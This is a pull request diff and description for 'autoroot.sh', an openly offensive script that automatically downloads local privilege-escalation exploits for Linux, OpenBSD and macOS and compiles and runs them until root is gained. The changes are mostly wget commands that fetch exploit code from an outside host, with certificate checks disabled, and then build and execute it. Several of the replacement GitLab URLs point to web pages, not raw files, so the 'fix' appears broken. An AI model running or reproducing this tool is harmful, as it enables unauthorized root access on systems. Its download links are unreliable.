### PR TITLE
Fix - link to new repo

### DIFF
--- a/autoroot.sh
+++ b/autoroot.sh
@@ -12,6 +12,7 @@ clear
 echo "==================================================="
 echo "              Auto Root Exploit v$ver"
 echo "                by Nilotpal Biswas"
+echo "              Edit: lowc0ff, leader of KirkSec."
 echo "==================================================="
 checkroot() {
 if [ $(id -u) == 0 ]; then
@@ -114,7 +115,7 @@ exploits/linux/local/40839.c
 )
 for i in "${array26c[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.c
 ccmpl
 done
 #sh
@@ -125,7 +126,7 @@ exploits/linux/local/10018.sh
 )
 for i in "${array26sh[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.sh
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.sh
 shcmpl
 done
 #py
@@ -134,12 +135,12 @@ exploits/linux/local/12130.py
 )
 for i in "${array26py[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.py
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.py
 pycmpl
 done
 #txt
 #exploits/linux/local/9191.txt
-wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz
+wget --no-check-certificate https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/9191.tgz
 tar -zxf 9191.tgz
 cd cheddar_bay
 bash cheddar_bay.sh
@@ -166,7 +167,7 @@ rm -rf exploit.sh
 rm -rf a.c
 rm -rf a
 #exploits/linux/local/29714.txt
-wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29714.tgz
+wget --no-check-certificate https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/29714.tgz
 tar -zxf 29714.tgz
 cd exploit
 make
@@ -176,7 +177,7 @@ cd ..
 rm -rf exploit
 rm -rf 29714.tgz
 #exploits/linux/local/33395.txt
-wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33395.tgz
+wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/33395.tgz
 tar -zxf 33395.tgz
 cd ext4_own
 bash ext4_own.sh
@@ -210,7 +211,7 @@ exploits/linux/local/38390.c
 )
 for i in "${array3c[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.c
 ccmpl
 done
 #txt
@@ -221,7 +222,7 @@ checkroot;
 rm -rf exploit.sh
 rm -rf *.c
 #exploits/linux/local/41999.txt
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/41999.c -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/41999.c -O exploit.c
 gcc exploit.c -masm=intel
 ./a.out 0
 checkroot;
@@ -247,7 +248,7 @@ checkroot;
 checkroot;
 rm a.out
 rm exploit.c
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/41999.py -O exploit.py
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/41999.py -O exploit.py
 python exploit.py
 checkroot;
 rm exploit.py
@@ -279,12 +280,12 @@ exploits/linux/local/39230.c
 )
 for i in "${array4c[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.c
 ccmpl
 done
 #txt
 #exploits/linux/local/39772.txt
-wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
+wget --no-check-certificate https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip
 cd 39772
 unzip 39772.zip
 tar -xf exploit.tar
@@ -307,7 +308,7 @@ rm -rf 39772
 rm -rf 39772.zip
 checkroot;
 #exploits/linux/local/40489.txt
-wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip
+wget --no-check-certificate https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/40489.zip
 unzip 40489.zip
 cd 40489
 bash compile.sh
@@ -345,7 +346,7 @@ exploits/openbsd/local/5979.c
 )
 for i in "${arrayopnc[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.c
 ccmpl
 done
 #txt
@@ -381,7 +382,7 @@ exploits/macos/local/40957.c
 )
 for i in "${arraymacc[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.c
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.c
 ccmpl
 done
 #sh
@@ -399,7 +400,7 @@ exploits/macos/local/43220.sh
 )
 for i in "${arraymacsh[@]}"
 do
-wget -q --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/$i -O exploit.sh
+wget -q --no-check-certificate https://gitlab.com/exploit-database/exploitdb/-/tree/main/$i -O exploit.sh
 shcmpl
 done
 #txt
@@ -428,7 +429,7 @@ rm -rf exploit.sh
 rm -rf charles_exploit.c
 rm -rf charles_exploit
 #exploits/macos/local/40669.txt
-wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40669.zip
+wget --no-check-certificate https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/40669.zip
 unzip 40669.zip
 cd 40669/
 clang -O3 -o task_nicely_t task_nicely_t.c


### PR DESCRIPTION
I fix the link because it was leading to a repository that the offensive-security no longer uses, now uses gitlab.

I found other flaws, but I'm still testing the solutions and debugging the script, I'll send the pull request for the next improvements soon.

- lowc0ff